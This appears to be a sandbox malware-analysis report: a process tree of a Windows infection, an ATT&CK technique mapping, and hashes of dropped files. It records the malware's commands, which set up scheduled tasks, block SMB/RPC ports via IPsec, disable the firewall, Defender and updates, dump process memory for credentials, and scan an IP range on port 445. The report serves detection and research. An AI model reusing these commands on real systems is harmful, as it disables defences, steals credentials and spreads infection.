- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2304
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2020
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4596
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4300
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1212
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2796
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2976
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2264
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1888
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3152
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3392
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1300
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3584
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1332
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:4464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3452
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3468
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2688
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:4512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4808
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4220
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4140
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      PID:4136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5024
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:856
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4900
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 792 C:\Windows\TEMP\dvpvfgkqq\792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5036
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 336 C:\Windows\TEMP\dvpvfgkqq\336.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2104 C:\Windows\TEMP\dvpvfgkqq\2104.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3088
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2664 C:\Windows\TEMP\dvpvfgkqq\2664.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3508
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2720 C:\Windows\TEMP\dvpvfgkqq\2720.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3016 C:\Windows\TEMP\dvpvfgkqq\3016.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3036 C:\Windows\TEMP\dvpvfgkqq\3036.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3720 C:\Windows\TEMP\dvpvfgkqq\3720.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3812 C:\Windows\TEMP\dvpvfgkqq\3812.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4964
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3876 C:\Windows\TEMP\dvpvfgkqq\3876.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1144
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3964 C:\Windows\TEMP\dvpvfgkqq\3964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1604 C:\Windows\TEMP\dvpvfgkqq\1604.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4408 C:\Windows\TEMP\dvpvfgkqq\4408.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1796 C:\Windows\TEMP\dvpvfgkqq\1796.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2800 C:\Windows\TEMP\dvpvfgkqq\2800.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:208
- C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
  C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3156 C:\Windows\TEMP\dvpvfgkqq\3156.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1952
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:888
- - C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exe
    nvmribbga.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1304

C:\Windows\SysWOW64\wooakm.exe
C:\Windows\SysWOW64\wooakm.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3004

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
1⤵
PID:3604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:2760
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
  2⤵
  PID:388

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe
1⤵
PID:2900
- C:\Windows\ime\iuclszl.exe
  C:\Windows\ime\iuclszl.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2016

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
1⤵
PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1384
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
  2⤵
  PID:1360

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
1⤵
PID:5380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5424
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F
  2⤵
  PID:5776

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\iuclszl.exe
1⤵
PID:388
- C:\Windows\ime\iuclszl.exe
  C:\Windows\ime\iuclszl.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5392

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
1⤵
PID:5224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5412
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F
  2⤵
  PID:5168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\awlverzbi\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\dvpvfgkqq\1604.dmp

Filesize
25.9MB

MD5
2c11c0dc86ecca8cea0cbe35aa5dff13

SHA1
18604e6ae91aacc9d59fc40a8d64c81256bd47db

SHA256
b0fa454ff46cdea06ca2f02dfe1f3161133f1eb413e2e0fbe5987586e9a0d818

SHA512
4debc15e5bfa0bc0e8295e78ff43165fc6b86cfbaf4564f33d40165a3b7cd6db5806f0c0298c3a245d82077be01796ad67ca6c127a176b19b388be4f182256bd

Download Submit
C:\Windows\TEMP\dvpvfgkqq\1796.dmp

Filesize
8.7MB

MD5
2fdbc16e37946f32ffbe3a8abbacea72

SHA1
76d12cf3f3bc1a415ad139e279eed5b5ff5e88cc

SHA256
f818f92e4b3bd946e02aeb33dcf67dd07230245c31b3f9d214089800c44881bf

SHA512
6bd06200bbaa3c8894e7bd181622d769907bbae14e40b2d08fc6b4474f03005974874c1fbbdbfd2bcec4785b8786994b654e30cf17c5d80b6a98b75bba53708e

Download Submit
C:\Windows\TEMP\dvpvfgkqq\2104.dmp

Filesize
4.2MB

MD5
f0edf2fc54c1d9817f8616ca675193f7

SHA1
de9241e90fb5f86df3bb577d73313d629853b297

SHA256
742e1db12dad0d0fd32ca29666fce2b4acab85bebbf078e8e62912786d18819e

SHA512
48bcdb0c33e2e9826c6b854d3fe52255f59f3b3d7106b43d59bca77649e3e033fd75fe22ff47c69ec1154d529a616000249b4d84416e72b63f52770c36bdcf71

Download Submit
C:\Windows\TEMP\dvpvfgkqq\2664.dmp

Filesize
3.7MB

MD5
2e67618ad5987333148c1c20a241eaac

SHA1
a1f046bfdf80b6171a0251fbd08e4e86dc3a3a06

SHA256
1f7bd1cce38ed3c1612c1e5233097e3571faf2a58c361662866694b1a5a90df1

SHA512
4ed04ff701807e42e1fd3cd47ad23029f292b9cd6b09136abcb10399308561b7cddc0cde683d9eabf81003bd3ef14d15797c3653e6911b8b268d9ffaa103b5f1

Download Submit
C:\Windows\TEMP\dvpvfgkqq\2720.dmp

Filesize
7.6MB

MD5
47e9e0f41ae9afe4390d502e89929b89

SHA1
da1826103ca01e7a11ab3475955c1152e28ad087

SHA256
7dc25bcbe32fbce1afa19d4307999bdd18088cb08c6f5033704a53d9a8ea4766

SHA512
12af718c20c63832c6b94c885a2c02a76c7bee41829806f44b7935a104b6b4888b5b4be09f03f2af9d0b9a86f56dd8c756066ade344e30d0fe507eb87261ca74

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3016.dmp

Filesize
814KB

MD5
2ff53496d6b700c8578a1a30802a1e5e

SHA1
6cc452be8c65e3419618aebb24d56e14d5a4fb01

SHA256
6b4d09330a5e32e87cc4aeeaa01240e962283b95a361df1d58747ff156982c52

SHA512
c7f36f50a8d33a5884758083ea3a87afcb9ccae0f27607a06a5ceab79da0ab18388c663f5e4224c9061a7e634691ba7312c09d2adee98c694ad66d5c86597c41

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3036.dmp

Filesize
2.9MB

MD5
cc67409fd7c8c78af3ba4fc898d2f60e

SHA1
32135be6907b8ab6b0a9a8b3fabdc9920e8a27f2

SHA256
062b250c3bf796f7cf0a1b3deaff1cfbf3c1e9df91d8e85992d7e09f7a978a4a

SHA512
83ce10558303467eff58543281a1ab72d12c310ecb9c930880a4cc43cb4515f71c9251a73e14a7d4aee92a4261de91f705a4effab324710d4c42b3c3ad89790f

Download Submit
C:\Windows\TEMP\dvpvfgkqq\336.dmp

Filesize
33.2MB

MD5
d0f25df50d18d7590f8577daf2031659

SHA1
39ca3c7154683a27e2316cd6acfbf6667abaf174

SHA256
fe27dc547953fe7aaac7cdad0ce37cdfdbfe0363ef2a0192b42a6f9ef1e43bfe

SHA512
90e38b0e24404e2051955ab0529a319302666e506da1ee749bbe89ba1c5fec604a21a9560a95083fd855b1863e9ed0b1e705653d12aa0dac459975ff69194dd4

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3720.dmp

Filesize
2.6MB

MD5
ec9ab2fd0157dc0b137692b8a2252c93

SHA1
fad4299fce2f2b068d73f850cd93d2bb2c7e164d

SHA256
16d3750fae6ee7a4c1ce4c9e91e3f7c53881b7866c137fad120b375f5d01be50

SHA512
3ccc7ab02a78ad36466548a5de5993e18e0e3206eadeb748f3c2e13e1baff260ab23481fe2855f7849908cc06b8eaf49fd9a51a98a31512598fdac87a4a1c8ad

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3812.dmp

Filesize
20.9MB

MD5
5f1e0a2dd35a3ea592c34abea7470b9b

SHA1
88b8eec6618d481e7425228cd839579cfed696af

SHA256
9b707bd7930afb675b57de5359f14743f8d93104a44332c7cd92ff3de7dab80c

SHA512
42785b2a242a9cce907b02cb79bd21bb392d9da6a582c693da113b5861e39c18789ec6fcabcf35e6c57fafb49806b5ba9ae8fc36c35a284da62f12f673303a3d

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3876.dmp

Filesize
4.2MB

MD5
2c79da46f1e44e9d9b0323e9f08e540b

SHA1
a9826e941abd1ec17cc90f4c973eb41e9a7d6de6

SHA256
b59549e1a4f710c54f294f01a3cfb11fd3b33157ebe5848c091b40962c471a4c

SHA512
9e8dfc1e8db6cb58add79c5916da14aecb3c46b9ff74730eabd1a45bef43d89ef80df6279884150af67a035eb1935096407743e31d11fa34557db5b5e137db02

Download Submit
C:\Windows\TEMP\dvpvfgkqq\3964.dmp

Filesize
44.0MB

MD5
a6f44be11e5fda2bf96ab922a0ebdbba

SHA1
856714c79fa7861f8e403a42f1477a5103a9a00e

SHA256
5e0ac487064bffe9ca8e8860c89390787572f9354949e69565cefba86fa7d3fb

SHA512
7b5cf6e161219219c48160828bf0ccba18a54d4ed06b40be14a7b7249c2082d85cab2ea095226df88e3c468dabb46ec6f8e8f47976da8d4f3a1114ab5feec794

Download Submit
C:\Windows\TEMP\dvpvfgkqq\4408.dmp

Filesize
1.2MB

MD5
d435a013ed757d3deecfe6fadf20d722

SHA1
33b9d6318dcad2998e16e8062e31d10a2e765baf

SHA256
a75d9ac7256249faa19bc3aab38255a927219d40c2aa7dc1be0781c141814c8c

SHA512
46732a941703de59afe821031fcb66e26035b0791f6bd29fe90a3c15a0fac066855b4f0f092e0592a3e974f49aab56b770f6cfc16a179cb361a2aa1f65bcdf67

Download Submit
C:\Windows\TEMP\dvpvfgkqq\792.dmp

Filesize
3.3MB

MD5
dc10687430c8dbc1f7967ae1362faee3

SHA1
937d3758e6a7e068a34ac171b67f813aded78284

SHA256
98c9960752b715473634aacf07a9feb1a0c73071dca8d41af7c802329f812064

SHA512
e869b97fd4fbda829c346559f6fb5daebe86d2d17c607ac1e50259915dc6b43d2653e14d71255b5ebb4adb52f46a92900b477ef4955c3cfcb4d0d4764dfb5169

Download Submit
C:\Windows\Temp\awlverzbi\nqrzsm.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\dvpvfgkqq\teaimmcwl.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsv1385.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsv1385.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\bekggbli\iuclszl.exe

Filesize
9.1MB

MD5
44cd4f797b3f756392ecc789c9ad2236

SHA1
017f4a07c968c449da9ab1f1aec7dcd590d26186

SHA256
084e7ac0cdbb4d1fd6ad45370bf585b4ef7d944a3ca38d03891815e5f03d0ae4

SHA512
86ac257b6843dec3aa818b2e4904f9c962b3af1cd23ed1c1ff79d1300ee6868c57ff69e83c02082ca431fa5d0bd84cc05f7d9659ba322e73125483d92042ecbc

Download Submit
C:\Windows\dvpvfgkqq\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
memory/208-231-0x00007FF7BC520000-0x00007FF7BC57B000-memory.dmp

Filesize
364KB

Download
